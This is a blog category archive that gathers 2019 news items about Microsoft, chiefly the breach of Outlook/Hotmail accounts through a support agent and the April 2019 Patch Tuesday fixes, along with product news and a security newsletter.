Category Archives: microsoft

Microsoft 365 security: Protecting users from an ever-evolving threat landscape

In this age of frequent security and data breaches, the statement “We take our customers’ privacy and security very seriously” has been heard from breached companies so often as to become a point of mockery, anger and frustration. But when Rob Lefferts, CVP of Microsoft 365 Security and Compliance, tells me the same thing (and the statement is not in response to a security breach), I believe him. If they didn’t, this cloud-based SaaS offering … More

The post Microsoft 365 security: Protecting users from an ever-evolving threat landscape appeared first on Help Net Security.

Microsoft’s Surface Hub 2S Starts at $8,999, Ships in June

The Surface Hub, Microsoft's digital whiteboard designed for conferences and meetings, received a hardware refresh today. From a report: At a press event at Steelcase's swanky New York City hub, the Redmond, Washington company detailed the improved Surface Hub 2S, which boasts a touchscreen that's higher in resolution than the original, plus a 4K front camera that supports video calling, an enhanced 8-microphone far-field microphone array, and other improvements. Surface 2S will ship in June, starting at $8,999 and going up to nearly $12,000. (That's the same base price as the original Surface Hub 2.) A larger version -- the Surface Hub 2S 85-inch -- will also be available at an as-yet-unrevealed price, and stands and wall mounts from Steelcase will be sold separately for $1,449.99 and $249, respectively.

Read more of this story at Slashdot.

Naked Security – Sophos: Internet Explorer browser flaw threatens all Windows users

Nearly four years after it was replaced by Edge as Microsoft’s preferred Windows browser, researchers keep finding unpleasant security flaws in Internet Explorer (IE).

Naked Security - Sophos

Microsoft Is Jumping Onto the Wireless Earbud Bandwagon, Says Report

According to a report by Brad Sams at Thurrott, Microsoft is going to expand its range of audio hardware with the introduction of a set of wireless earbuds. They will accompany the Surface Headphones, a premium-priced pair of wireless headphones that Microsoft released last year. Ars Technica reports: Microsoft has shipped earbuds before: the Zune media player came with earbuds with a feature that sounds simple but is actually ingenious: the earbuds were magnetic and would stick together back to back. The result? Much less cable tangling when you put them in your pocket or bag. Surface Headphones seem to be competitive with other noise-cancelling over-the-ear headphones: their wireless range is great, the noise cancelling is solid, and their volume and noise-cancelling dials are a joy to use, but their battery life and Bluetooth audio standard support are both weak. As such, Microsoft is not totally without experience in this area and has shown that it can engineer thoughtful, compelling designs. How the putative earbuds will stand out from the crowd remains to be seen, of course. The existing Surface Headphones were codenamed Joplin, raising the question: Janis or Scott? The earbuds make the answer to that question clear; they're apparently codenamed Morrison, as in Jim, meaning that the over-the-ear headphones are clearly named for Janis. Sams says that "Surface Buds" has been mooted as their retail name, with a possible launch in 2019.

Read more of this story at Slashdot.

Hackers snab emails and more in Microsoft Outlook, Hotmail, and MSN compromise

Long-time users of certain Microsoft products, such as Hotmail, MSN, and Outlook, found they may be wrapped up in a hack grabbing snippets of email information, and in some cases, a little bit more.

Microsoft email services have been around forever in Internet time. Yet, many users still have a few Hotmail accounts rattling around. While most have long since moved on from MSN and Hotmail to Live and Outlook, all of these email accounts are still chugging away in one form or another.

Perhaps it’s an email you’ve pretty much grown up with and don’t want to let go. Maybe your old Microsoft-supplied email address is tied into large portions of the MS ecosystem, and you’d rather not start trying to reinvent the wheel. It could be you just appreciate the novelty of having a legacy email address, which is becoming rarer with each passing moment.

No matter your angle, and regardless of your stance on whether a Hotmail account is even a good idea anymore, people still make use of them.

This is where our tale of compromise woe begins.

What happened?

A customer support agent was compromised by hackers and used to gain access to certain pieces of email data. If your account was for business, you’re safe. If it was a free personal account, however, it might have been affected. As per the notification email from Microsoft, which appears to have gone out over the weekend:

Dear customer,

We have identified that a Microsoft support agent’s credentials were compromised, enabling individuals outside Microsoft to access information without your Microsoft email account. This unauthorised access could have allowed unauthorised parties to access and / or view information related to your email account (such as your email address, folder names, the subject lines of emails, and the names of other email addresses you communicate with), but not the content of any emails or attachments, between January 1st 2019 and March 28th 2019.

While Microsoft stated that no email content was pilfered, a little while after their initial reveal, they had to update their warnings to state that about 6 percent of the total affected users had, in fact, had email body content accessed.

Microsoft hasn’t revealed how many users in total were affected during the attack, which took place between January 1 and March 28, but actual email content accessed is a significant step up in severity from subject lines and contacts.

What steps did Microsoft take?

Once the attack was brought to Microsoft’s attention, they shut it down quickly. Going back to their notification email:

Upon awareness of this issue, Microsoft immediately disabled the compromised credentials, prohibiting their use for any further unauthorised access…it is important to note that your email login credentials were not directly impacted by this incident. However, out of caution, you should reset your password for your account.

They also advised users to be wary of phishing attacks and social engineering tactics in general. All the same, information is a little thin on the ground.

As TechCrunch notes, Microsoft hasn’t revealed if the support account was a third party or belonged to a Microsoft employee, or which regions were impacted—aside from a reference to the EU in one of the emails.

Additionally, Microsoft claims this took place over three months; an informant for Motherboard reckons it was more like six (which Microsoft denies).

Next steps?

At this point, we’d usually suggest security tips along the lines of changing your passwords, but this attack is tricky because it didn’t involve credentials. It seems no matter how locked down your account was, the method of attack allowed hackers to see what they wanted to see.

As Microsoft suggests, feel free to change your password if it makes you feel more reassured. If you want to boost your online webmail account security, there’s never been a better time to begin. You might also want to rethink hanging onto those dinosaur, legacy accounts, as they are huge targets for cybercriminals.

The biggest risk from this attack is most likely to the small number of users whose full email content was viewable by the hackers. With any luck, what they saw was nothing too sensitive. For our part, we recommend checking out our suggestions for spotting dubious emails to cover any potential social engineering or phishing attempts spurred by this attack.

It’s definitely bad, but it could’ve been a lot worse. The lesson we can hopefully learn from this one: Be thankful for small mercies.

The post Hackers snab emails and more in Microsoft Outlook, Hotmail, and MSN compromise appeared first on Malwarebytes Labs.

Disc-Free Xbox One S Could Land on May 7

Microsoft is about to launch an even cheaper Xbox One S. In order to cut costs, the company is removing the Blu-ray disc drive altogether. According to leaked marketing images spotted by WinFuture, the console could launch on May 7th for $258 in Germany. From a report: Given that the launch is just a few weeks away and that those marketing images line up perfectly with previous rumors, chances are this is the real deal. As you can see on WinFuture's images, it looks exactly like an Xbox One S without the disc slot. The console is called Xbox One S All Digital and comes with a 1TB hard drive -- most standard Xbox One S consoles currently also feature a 1TB hard drive. Microsoft states clearly that this console is only for digital games. If you already have physical Xbox One games, you won't be able to insert them in the console.

Read more of this story at Slashdot.

Hackers Could Read Your Hotmail, MSN, and Outlook Emails by Abusing Microsoft Support

eatmorekix writes: On Saturday, Microsoft confirmed that some users of the company's email service had been targeted by hackers. A hacker or group of hackers had first broken into a customer support account for Microsoft, and then used that to gain access to information related to customers' email accounts such as the subject lines of their emails and who they've communicated with. But the issue is much worse than previously reported, with the hackers able to access email content from a large number of Outlook, MSN, and Hotmail email accounts, according to a source who witnessed the attack in action and described it before Microsoft's statement, as well as screenshots provided to Motherboard. Microsoft confirmed to Motherboard that hackers gained access to the content of some customers' emails.

Read more of this story at Slashdot.

Microsoft Halts Windows 7 And 8.1 April Updates For Some Users Due To System Crashes

Once again, Microsoft pulled updates for Windows users owing to system crash issues. However, this time, the problem does not

Microsoft Halts Windows 7 And 8.1 April Updates For Some Users Due To System Crashes on Latest Hacking News.

E Hacking News – Latest Hacker News and IT Security News: Microsoft’s email services hacked

Microsoft has confirmed a data breach by unknown hackers who may have succeeded in accessing a “limited” number of Microsoft customers’ email accounts.

According to the company, hackers breached the Microsoft network between January 1 and March 28 after compromising a Microsoft support agent’s credentials.

Microsoft sent an email notification to affected customers stating, “This unauthorized access could have allowed unauthorized parties to access and/or view information related to your email account (such as your e-mail address, folder names, the subject lines of e-mails, and the names of other e-mail addresses you communicate with), but not the content of any e-mails or attachments.”

The company confirmed to TechCrunch that accounts of users of services such as @msn.com and @hotmail.com had been compromised in the breach, but the exact number of victims is not known.

“We addressed this scheme, which affected a limited subset of consumer accounts, by disabling the compromised credentials and blocking the perpetrators’ access,” said a Microsoft spokesperson in an email.

Microsoft is urging all affected users to change their passwords immediately.

E Hacking News - Latest Hacker News and IT Security News

Microsoft Says Some Webmail Accounts Were Compromised

A "limited" number of users of Microsoft's webmail services -- which include Hotmail, Outlook.com, and MSN -- "had their accounts compromised," TechCrunch reports. "We addressed this scheme, which affected a limited subset of consumer accounts, by disabling the compromised credentials and blocking the perpetrators' access," said a Microsoft spokesperson in an email. According to an email Microsoft has sent out to affected users, malicious hackers were potentially able to access an affected user's e-mail address, folder names, the subject lines of e-mails, and the names of other e-mail addresses the user communicates with -- "but not the content of any e-mails or attachments," nor -- it seems -- login credentials like passwords. Microsoft is still recommending that affected users change their passwords regardless. The breach occurred between January 1 and March 28, Microsoft's letter to users said. The hackers got into the system by compromising a customer support agent's credentials, according to the letter. Once identified, those credentials were disabled. Microsoft told users that it didn't know what data was viewed by the hackers or why, but cautioned that users might as a result see more phishing or spam emails.

Read more of this story at Slashdot.

Attackers hacked support agent to access Microsoft Outlook email accounts

Bad news for users of the Microsoft Outlook email service: hackers compromised a Microsoft support agent’s account to access their email accounts.

Earlier this year, hackers breached Microsoft’s customer support portal and gained access to some email accounts registered with Microsoft’s Outlook service.

Microsoft notified some of its users of the security breach, confirming via email that hackers had accessed information about their Outlook accounts between 1 January 2019 and 28 March 2019.

Several Reddit users confirmed to have received a data breach notification email from Microsoft and one of them published an image of the message:

Microsoft Outlook data breach

Microsoft’s security breach notification email states that unknown attackers were able to compromise the credentials of one of Microsoft’s customer support agents. The company did not provide additional details on how the hackers compromised the employee’s account or on the number of affected accounts.

A Microsoft customer support agent can view account email addresses, folder names, subject lines of emails, and the email addresses a user has sent messages to. The attackers used the compromised credentials to access information belonging to the affected accounts. The company pointed out that the attackers were not able to access the content of emails or attachments.

“Our data indicates that account-related information (but not the content of any e-mails) could have been viewed, but Microsoft has no indication why that information was viewed or how it may have been used,” reads the breach notification email.

Experts at THN highlighted that even two-factor authentication could not have prevented access to users’ accounts.

Microsoft disabled the compromised credentials:

“We addressed this scheme, which affected a limited subset of consumer accounts, by disabling the compromised credentials and blocking the perpetrators’ access.”

Microsoft recommended that all users, even those not affected, reset the passwords for their Microsoft accounts as a precautionary measure.

“Microsoft regrets any inconvenience caused by this issue,” concludes the company. “Please be assured that Microsoft takes data protection very seriously and has engaged its internal security and privacy teams in the investigation and resolution of the issue, as well as additional hardening of systems and processes to prevent such recurrence.”

Pierluigi Paganini

(SecurityAffairs – hacking, Microsoft Outlook)

The post Attackers hacked support agent to access Microsoft Outlook email accounts appeared first on Security Affairs.

Hackers Compromise Microsoft Support Agent to Access Outlook Email Accounts

If you have an account with Microsoft's Outlook email service, there is a possibility that your account information has been compromised by an unknown hacker or group of hackers, Microsoft confirmed to The Hacker News. Earlier this year, hackers managed to breach Microsoft's customer support portal and access information related to some email accounts registered with the company's Outlook service.

Is Microsoft Quietly Lobbying Against Right-To-Repair Legislation?

Microsoft "has been quietly lobbying against Right to Repair legislation, which would prevent Microsoft from penalizing customers when they open up their devices," claims MSPoweruser: Jeff Morris, Democratic member of the [Washington state] House of Representatives claims Microsoft has blocked legislation from being passed despite strong bipartisan support. In an interview on iFixit's Repair Radio [YouTube], Rep. Jeff Morris said that "word on the street" was that Microsoft, "marshalled forces to keep the bill from moving out of the House Rules committee." He claimed "there was a tax proposal here ... to pay for STEM education," and that "in exchange for Microsoft support[ing that tax,] having Right to Repair die..." was a condition, as well as another privacy policy Microsoft wanted to advance. The state representative hedged that "I can't confirm or deny this, because I have not seen a smoking gun." But he also told his interviewer that to paint a discouraging picture of the landscape after passage of the bill, "Microsoft was going around telling our members that they wouldn't sell Surface Tablets in Washington any longer."

Read more of this story at Slashdot.

Microsoft April Patch Tuesday Also Addresses Two Zero-Day Bugs With Numerous Others

Microsoft April Patch Tuesday updates are out with numerous bug fixes. Apart from the other vulnerabilities, Microsoft has also patched

Microsoft April Patch Tuesday Also Addresses Two Zero-Day Bugs With Numerous Others on Latest Hacking News.

Threat Source (April 11)

Newsletter compiled by Jonathan Munshaw.

Welcome to this week’s Threat Source newsletter — the perfect place to get caught up on all things Talos from the past week.

If you haven’t yet, there’s still time to register for this year’s Talos Threat Research Summit — our second annual conference by defenders, for defenders. This year’s Summit will take place on June 9 in San Diego — the same day Cisco Live kicks off in the same city. We sold out last year, so hurry to register!

We made waves this week with an article on malicious groups on Facebook. We discovered thousands of users who were offering to buy and sell various malicious services, such as carding, spamming and the creation of fake IDs. News outlets across the globe covered this story, including NBC News, Forbes and WIRED.

There’s also new research on the Gustuff malware. Researchers discovered this banking trojan earlier this year, and recently, we tracked it targeting Australian users in the hopes of stealing their login credentials to financial services websites.

Finally, we also have our weekly Threat Roundup, which you can find on the blog every Friday afternoon. There, we go over the most prominent threats we’ve seen (and blocked) over the past week.

Upcoming public engagements with Talos


Location: Salt Lake City, Utah
Date: April 25
Speaker: Nick Biasini
Synopsis: Join Nick Biasini as he takes part in a day-long education event on all things Cisco. Nick will be specifically highlighting the work that Talos does as one part of the many breakout sessions offered at Cisco Connect. This session will cover a brief overview of what Talos does and how we operate. Additionally, he'll discuss the threats that are top-of-mind for our researchers and the trends that you, as defenders, should be most concerned about.  

Cyber Security Week in Review

  • WikiLeaks founder Julian Assange was arrested in London on Thursday after being extradited from the Ecuadorian embassy. Hours later, the U.S. formally charged him with conspiracy to commit computer intrusion. WikiLeaks is responsible for leaking thousands of classified government documents over the years.
  • Amazon workers reportedly listen to some conversations with Alexa devices in order to improve the software’s voice recognition technology. A handful of employees transcribe the recordings, annotate them and then feed it back into the software.
  • Yahoo agreed to a $118 million settlement with users over a 2013 data breach. The breach at the company, which is now owned by Verizon, affected 3 billion users worldwide, but Yahoo kept it quiet for years.
  • The U.S. government released a warning regarding the new “HOPLIGHT” malware that appears to originate from North Korea. According to a report from the FBI and Department of Homeland Security, the malware has the ability to read, write and move files, connect to a remote host, and upload and download files, among other functions.
  • Verizon patched a vulnerability in some of its routers that could have allowed an attacker to gain root privileges. This could allow them to target other devices on the network, such as internet-of-things equipment. 
  • Security researchers bypassed the Samsung Galaxy S10’s fingerprint scanner with a 3-D printed model. This means that attackers could potentially steal users’ fingerprints and then be able to gain physical access to their devices.
  • Three recent spam campaigns are spreading the TrickBot malware via malicious attachments that disguise themselves as tax documents. The attackers spoof ADP and Paychex, two producers of human resources and payment software.
  • Cybersecurity companies are pledging to help users remove so-called "stalkerware" from users' smartphones. The companies say they will send alerts to users if this software, which is traditionally used to track other users, is detected on their device.

Notable recent security issues

Title: Microsoft patches 74 vulnerabilities, 14 critical
Description: Microsoft released its monthly security update Tuesday, disclosing a variety of vulnerabilities in several of its products. The latest Patch Tuesday covers 74 vulnerabilities, 16 of which are rated “critical” and 58 that are considered “important.” This release also includes a critical advisory covering a security update to Adobe Flash Player. This month’s security update covers security issues in a variety of Microsoft’s products, including the Chakra Scripting Engine, Microsoft Office and Windows 10.
Snort SIDs: 45632, 45635, 46548, 46549, 49380, 49381, 49688, 49689, 49692 - 49711, 49716 - 49723, 49727 - 49747, 49750 - 49755

Title: Adobe fixes vulnerabilities in Flash Player, Acrobat
Description: Adobe patched vulnerabilities in 15 of its products this week as part of its monthly security update. The vulnerabilities disclosed include critical memory corruption bugs in Shockwave, as well as remote code execution vulnerabilities in Acrobat Reader.
Snort SIDs: 48293, 49294

Most prevalent malware files this week


Top spam stats for this week

Top 5 spam subjects observed
  • "Help Desk: Planned maintenance for Tuesday 9th"
  • "Iron Mountain Australia Group Pty Ltd - Invoice Number AUS402803"
  • "Fwd: Netflix statement Of Payment."
  • "Please approve - Allina"
  • "Your Netflix Membership Has Been Suspended"
Top 5 most used ASNs for sending spam
  • 8075 Microsoft Corporation
  • 3136 State of WI Dept. of Administration
  • 6276 OVH SAS
  • 8560 1&1 Internet SE
  • 16509 Amazon.com, Inc.

Update now! Here’s the April Patch Tuesday roundup

Microsoft and Adobe Patch Tuesday updates are here. Find out more about the most serious bugs and how to patch them.

Security Affairs: Microsoft April 2019 Patch Tuesday fixes Windows 0days under attack

Microsoft Patches Windows Privilege Escalation Flaws Exploited in Attacks

Microsoft has released its April 2019 Patch Tuesday updates that address over 70 vulnerabilities, including two Windows zero-day flaws.

Microsoft has released the April 2019 Patch Tuesday updates that address 74 vulnerabilities, including two Windows zero-days under active attack.

April 2019 Patch Tuesday security updates resolve over a dozen critical remote code execution and privilege escalation vulnerabilities affecting Windows and Microsoft browsers.

The vulnerabilities exploited in the wild tracked as CVE-2019-0803 and CVE-2019-0859 could allow an attacker to escalate privileges on the target system.

April 2019 Patch Tuesday

Both vulnerabilities are tied to the way the Win32k component in Windows handles objects in memory; an authenticated attacker could exploit them to execute arbitrary code in kernel mode.

“An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.” reads the security advisory for CVE-2019-0803, which is identical to the one for the CVE-2019-0859 flaw.

“To exploit this vulnerability, an attacker would first have to log on to the system. An attacker could then run a specially crafted application that could exploit the vulnerability and take control of an affected system.

The update addresses this vulnerability by correcting how Win32k handles objects in memory.”

The flaws were respectively discovered by researchers at Kaspersky Lab and Donghai Zhu of the Alibaba Cloud Intelligence Security Team.

Microsoft did not reveal details about the vulnerabilities and the way threat actors have exploited them.

Adobe also released its Patch Tuesday updates for April 2019, which address a total of 43 vulnerabilities affecting eight of the company’s products.

Pierluigi Paganini

(SecurityAffairs – Microsoft Patch Tuesday, zero-days)

The post Microsoft April 2019 Patch Tuesday fixes Windows 0days under attack appeared first on Security Affairs.

Security Affairs

April 2019 Patch Tuesday: Microsoft fixes two actively exploited bugs

Microsoft has plugged 74 CVE-numbered security holes on this April 2019 Patch Tuesday, including two vulnerabilities actively exploited by attackers. All of the bugs are rated either Critical or Important. Adobe has also released security updates for many of its products, including the widely used Flash Player and Shockwave Player (the freeware software plug-in for viewing multimedia and video games in web pages). The Adobe updates: Adobe has provided security updates for many software packages. … More

The post April 2019 Patch Tuesday: Microsoft fixes two actively exploited bugs appeared first on Help Net Security.

TrendLabs Security Intelligence Blog: April’s Patch Tuesday Fixes Two Vulnerabilities Being Exploited in the Wild

Microsoft’s April security update includes fixes for 74 CVEs, including two vulnerabilities that are actively exploited in the wild. Of the vulnerabilities patched in this update, 13 are rated Critical and 61 are rated Important. The patches this month cover a significant number of Microsoft products and services, namely: Internet Explorer, Edge, Windows, ChakraCore, Microsoft Office and Microsoft Office Services and Web Apps, .NET Framework and ASP.NET, Exchange Server, Visual Studio, Skype for Business, Azure DevOps Server, Open Enclave SDK, and Team Foundation Server. Two of the vulnerabilities were disclosed via the Zero Day Initiative (ZDI).

CVE-2019-0803 and CVE-2019-0859 are two Win32k Elevation of Privilege vulnerabilities actively being exploited, very similar to Win32k vulnerabilities addressed in March. If successfully exploited, these vulnerabilities could provide attackers with elevated privileges without authorization, allowing them to install programs, manipulate data, and create new accounts with full user rights.

Other notable vulnerabilities include:

  • CVE-2019-0853, a GDI+ Remote Code Execution Vulnerability. A number of Microsoft programs, notably the OS and Office suite, use the GDI+ component. Discovered by ZDI’s Hossein Lotfi, this vulnerability occurs when parsing EMF file records. A specially crafted EMF file record can trigger access of an uninitialized pointer, which allows an attacker to execute arbitrary code.
  • CVE-2019-0688, a Windows TCP/IP Information Disclosure Vulnerability. IP fragmentation has been a problem for years, and apparently remains an issue. This bug in the Windows TCP/IP stack could allow information disclosure from improperly handling fragmented IP packets. The vulnerability could expose data such as SAS token and resource IDs.

Meanwhile, Adobe has released eight patches for Acrobat and Reader, Adobe Digital Editions, Flash, Bridge CC, XD CC, Shockwave, InDesign, Dreamweaver, and Experience Manager Forms. The patch for Adobe InDesign fixes a Critically-rated Unsafe Hyperlink Processing vulnerability that could lead to arbitrary code execution. The patch for Adobe Acrobat and Reader addresses 21 CVEs, 11 of which are rated Critical. All of the Critical vulnerabilities could lead to arbitrary code execution. Adobe Shockwave also received an update for seven Critical CVEs, although it has already reached its end-of-life. Adobe will no longer provide support for Shockwave; the company has released an FAQ to guide remaining users.

The Trend Micro™ Deep Security™ and Vulnerability Protection solutions protect user systems from threats that may target the vulnerabilities addressed in this month’s Patch Tuesday via the following Deep Packet Inspection (DPI) rules:

  • 1009647-Microsoft Windows GDI Elevation Of Privilege Vulnerability (CVE-2019-0803)
  • 1009649-Microsoft Windows Multiple Security Vulnerabilities (Apr-2019)
  • 1009650-Microsoft XML Remote Code Execution Vulnerability (CVE-2019-0793)
  • 1009651-Microsoft XML Remote Code Execution Vulnerability (CVE-2019-0794)
  • 1009652-Microsoft Edge Chakra Scripting Engine Memory Corruption Vulnerability (CVE-2019-0806)
  • 1009653-Microsoft Graphics Components Remote Code Execution Vulnerability (CVE-2019-0822)
  • 1009654-Microsoft Windows VBScript Engine Remote Code Execution Vulnerability (CVE-2019-0862)
  • 1009655-Microsoft Internet Explorer Scripting Engine Memory Corruption Vulnerability (CVE-2019-0752)
  • 1009656-Microsoft Internet Explorer Scripting Engine Memory Corruption Vulnerability (CVE-2019-0753)
  • 1009657-Microsoft Edge Chakra Scripting Engine Memory Corruption Vulnerability (CVE-2019-0861)
  • 1009658-Microsoft Edge Chakra Scripting Engine Memory Corruption Vulnerability (CVE-2019-0810)
  • 1009659-Microsoft Edge Chakra Scripting Engine Memory Corruption Vulnerability (CVE-2019-0812)
  • 1009660-Microsoft Edge Chakra Scripting Engine Memory Corruption Vulnerability (CVE-2019-0829)
  • 1009661-Microsoft Edge Chakra Scripting Engine Memory Corruption Vulnerability (CVE-2019-0860)
  • 1009662-Adobe Flash Player Out-of-Bounds Read Vulnerability (CVE-2019-7108)
  • 1009663-Adobe Acrobat And Reader Multiple Security Vulnerabilities (APSB19-17) – 1
  • 1009666-Adobe Acrobat And Reader Multiple Security Vulnerabilities (APSB19-17) – 2


Customers who have the Trend Micro™ TippingPoint® system are protected from threats that may exploit this month’s list of vulnerabilities via these MainlineDV filters:

  • 34889: HTTP: Delta Industrial Automation CNCSoft Buffer Overflow Vulnerability (ZDI-18-1071)
  • 34899: HTTP: Adobe Flash Player MovieClip Use-After-Free Vulnerability (Upload)
  • 34901: ZDI-CAN-7273: Zero Day Initiative Vulnerability (Belkin SuperTask)
  • 34902: ZDI-CAN-7274: Zero Day Initiative Vulnerability (Belkin SuperTask)
  • 34903: ZDI-CAN-7275: Zero Day Initiative Vulnerability (Belkin SuperTask)
  • 34906: ZDI-CAN-8341: Zero Day Initiative Vulnerability (Adobe Reader DC)
  • 34912: HTTP: Adobe Flash Player attachMovie Use-After-Free Vulnerability (Upload)
  • 34914: HTTP: Adobe Flash Player attachMovie Use-After-Free Vulnerability
  • 34917: ZDI-CAN-7787: Zero Day Initiative Vulnerability (Adobe Acrobat Pro DC)
  • 34918: ZDI-CAN-7858: Zero Day Initiative Vulnerability (Adobe Acrobat Pro DC)
  • 34919: ZDI-CAN-7939: Zero Day Initiative Vulnerability (Adobe Acrobat Pro DC)
  • 34920: ZDI-CAN-8228: Zero Day Initiative Vulnerability (Adobe Acrobat Pro DC)
  • 34921: ZDI-CAN-8265: Zero Day Initiative Vulnerability (Adobe Acrobat Pro DC)
  • 34922: ZDI-CAN-8272: Zero Day Initiative Vulnerability (Adobe Acrobat Pro DC)
  • 34929: HTTP: Microsoft Scripting Engine RegExp Memory Corruption Vulnerability
  • 34930: HTTP: Microsoft Internet Explorer XSL Use-After-Free Vulnerability
  • 34931: HTTP: Microsoft Internet Explorer VBScript Integer Overflow Vulnerability
  • 34933: HTTP: Microsoft Office Protocol Handler Directory Traversal Vulnerability
  • 34936: HTTP: Microsoft Windows Chakra Scripting Engine Memory Corruption Vulnerability
  • 34937: HTTP: Microsoft Windows Chakra Scripting Engine Memory Corruption Vulnerability
  • 34938: HTTP: Microsoft Windows Chakra Scripting Engine Memory Corruption Vulnerability
  • 34939: HTTP: Microsoft Windows Win32k Use-After-Free Vulnerability
  • 34941: HTTP: Microsoft Chakra Memory Corruption Vulnerability
  • 34944: HTTP: Microsoft Windows NT KASLR Information Disclosure Vulnerability
  • 34945: HTTP: Microsoft Windows Win32K Use-After-Free Vulnerability
  • 34946: HTTP: Microsoft Chakra Memory Corruption Vulnerability
  • 34947: HTTP: Microsoft Chakra Memory Corruption Vulnerability
  • 34948: HTTP: Microsoft Internet Explorer Use-After-Free Vulnerability
  • 34949: HTTP: Microsoft Windows Win32k Use-After-Free Vulnerability
  • 34951: HTTP: Microsoft Windows GDI Use-After-Free Vulnerability
  • 34953: ZDI-CAN-8293: Zero Day Initiative Vulnerability (Adobe Acrobat Pro DC)
  • 34954: ZDI-CAN-8055: Zero Day Initiative Vulnerability (Microsoft Windows)
  • 34955: ZDI-CAN-8036: Zero Day Initiative Vulnerability (Microsoft Windows)
  • 34956: ZDI-CAN-8056: Zero Day Initiative Vulnerability (Microsoft Windows)
  • 34957: ZDI-CAN-8058: Zero Day Initiative Vulnerability (Microsoft Windows)

The post April’s Patch Tuesday Fixes Two Vulnerabilities Being Exploited in the Wild appeared first on .



TrendLabs Security Intelligence Blog

Windows 10: New update controls for end users, automatic removal of broken updates

It seems that last year’s Windows 10 updating troubles have spurred Microsoft to make some changes to the operating system’s update experience and the company’s quality testing of updates. “In previous Windows 10 feature update rollouts, the update installation was automatically initiated on a device once our data gave us confidence that device would have a great update experience. Beginning with the Windows 10 May 2019 Update, users will be more in control of initiating … More

The post Windows 10: New update controls for end users, automatic removal of broken updates appeared first on Help Net Security.

Windows 10 now no longer requires you to ‘safely remove hardware’

Windows 10 now allows you to safely remove USB by just pulling it out, Microsoft confirms

With the release of Windows 10 version 1809, Microsoft is finally addressing the issue of accidentally removing a USB drive, or shutting down your computer, without ejecting it first.

Microsoft is changing the default setting that is applied to USB drives and other removable media. The Redmond-based tech firm is offering two main policies regarding removal of external storage devices: Quick Removal and Better Performance.

Starting with Windows 10 version 1809, ‘Quick removal’ will be the default policy on Microsoft Windows 10, which in earlier versions of Windows was ‘Better performance,’ states the updated Microsoft support page. However, it is still possible to change the policy setting for each external device. The policy continues to remain in effect until you disconnect the device and then connect it again to the same computer port.

Quick Removal, as the name suggests, allows you to safely eject a USB or Thunderbolt-enabled external drive at any time, bypassing the Safely Remove Hardware process. To make this safe, however, Windows cannot cache disk write operations, which may lower the performance of the system.

On the other hand, Better performance policy manages storage operations in a manner that improves system performance. In this process, Windows can cache write operations to the external device. However, you must use the Safely Remove Hardware process to remove the external drive, or else you risk losing data.

If you select Better performance, it is recommended that you also select Enable write caching on the device, adds the Microsoft support page.

To change the policy for an external storage device, you need to follow the steps below:

1. Connect the device to the computer.

2. Right-click Start, and then select File Explorer.

3. In File Explorer, identify the letter or label that is associated with the device (for example, USB Drive (D:)).

4. Right-click Start, and then select Disk Management.

5. In the lower section of the Disk Management window, right-click the label of the device, and then click Properties.

6. Select Policies, and then select the policy you want to use.

The change in default policy for an external storage device in Windows 10 will definitely be welcomed by many seasoned Windows users who can now simply skip the Safely Remove Hardware process without getting annoyed or fear losing data.

Source: Microsoft

The post Windows 10 now no longer requires you to ‘safely remove hardware’ appeared first on TechWorm.

Microsoft officially rolls out Launcher version 5.3 for Android

Microsoft Launcher version 5.3 for Android rolls out with a new weather widget, To-Do integration and more

Last month, Microsoft had started beta testing the first major version of its popular Launcher 5.3 for Android that included several improvements.

For those unaware, Microsoft Launcher (formerly known as Arrow Launcher) is an application launcher created by Microsoft for the Android OS platform as a lightweight, fast, and efficient simplification of the Android user experience.

Effective yesterday, Microsoft has officially pushed out version 5.3 of Launcher for Android. While the most important change is the redesigned Time/Weather widget, there are also changes such as Tasks card support for To-Do’s My Day, flagged e-mails from Outlook, and fine-tuning of UX fundamentals and usability.

Let’s have a look at what’s new in Microsoft Launcher v5.3:

– Time/Weather widget redesign – Now you can have multiple widgets in multiple sizes in multiple styles for multiple locations! Also, check out the updated and more detailed L2 page with hourly and 10-day forecast.
– UX refinements to the Home Screen, Dock and Search widget
– Tasks card now supports “My Day” from Microsoft To Do
– News tab now supports “Technology” as a news interest
– Font type changed from Segoe UI to Roboto
– Work profile customers can now get access to their work apps
– Beta community link in Settings changed to lead to Microsoft Tech Community

The recent updates to Launcher, along with its integration with Cortana, To-Do, Office, Windows Timeline, Microsoft News, Bing Rewards, and Sticky Notes, make it the go-to place for those who depend on Microsoft products.

You can download the latest version of Microsoft Launcher 5.3 from the Google Play Store. Alternatively, you can also use that link to join the beta program.

Source: Microsoft

The post Microsoft officially rolls out Launcher version 5.3 for Android appeared first on TechWorm.

The Laws of Vulnerabilities – Qualys Blog: April 2019 Patch Tuesday – 74 Vulns, 16 Critical, 2 Actively Attacked, 1 PoC Exploit, Adobe Vulns

This month’s Patch Tuesday addresses 74 vulnerabilities, with 16 labeled as Critical. Eight of the Critical vulns are for scripting engines and browser components, impacting Microsoft browsers and Office, along with another 5 Critical vulns in MSXML. Two Critical remote code execution (RCE) vulnerabilities are patched in GDI+ and IOleCvt. Two privilege escalation vulns in Win32k are reported as Actively Attacked, while another in the Windows AppX Deployment Service has a public PoC exploit.

Workstation Patches

Scripting Engine and MSXML patches should be prioritized for workstation-type devices, meaning any system that is used for email or to access the internet via a browser. This includes multi-user servers that are used as remote desktops for users.

Actively Attacked Privilege Escalation in Win32k

Two vulnerabilities (CVE-2019-0803 & CVE-2019-0859) exist in Win32k that could lead to privilege escalation if exploited. Microsoft reports both of these vulnerabilities as Actively Attacked. Patching should be prioritized for both Workstations and Servers.

Windows AppX Deployment Service Privilege Escalation PoC

Another privilege escalation vulnerability exists in the Windows AppX Deployment Service (AppXSVC). This service is responsible for the deployment of Windows Store apps. The vulnerability involves the service’s handling of hard links. A PoC has been made available in the public domain. Patching should be prioritized for both Workstations and Servers, as this service exists on both Windows 10 and Server 2019.

RCE vulns in GDI+ and IOleCvt

Two Critical remote code execution (RCE) vulnerabilities are patched in GDI+ and IOleCvt. These vulnerabilities require user interaction, and patching should be prioritized for workstation-type systems.

Privilege Escalation in SMB Server

A privilege escalation vulnerability was patched in the SMB Server. Exploiting this vulnerability requires the attacker to be logged into the target system and to access a malicious file via SMB.

Adobe Patches

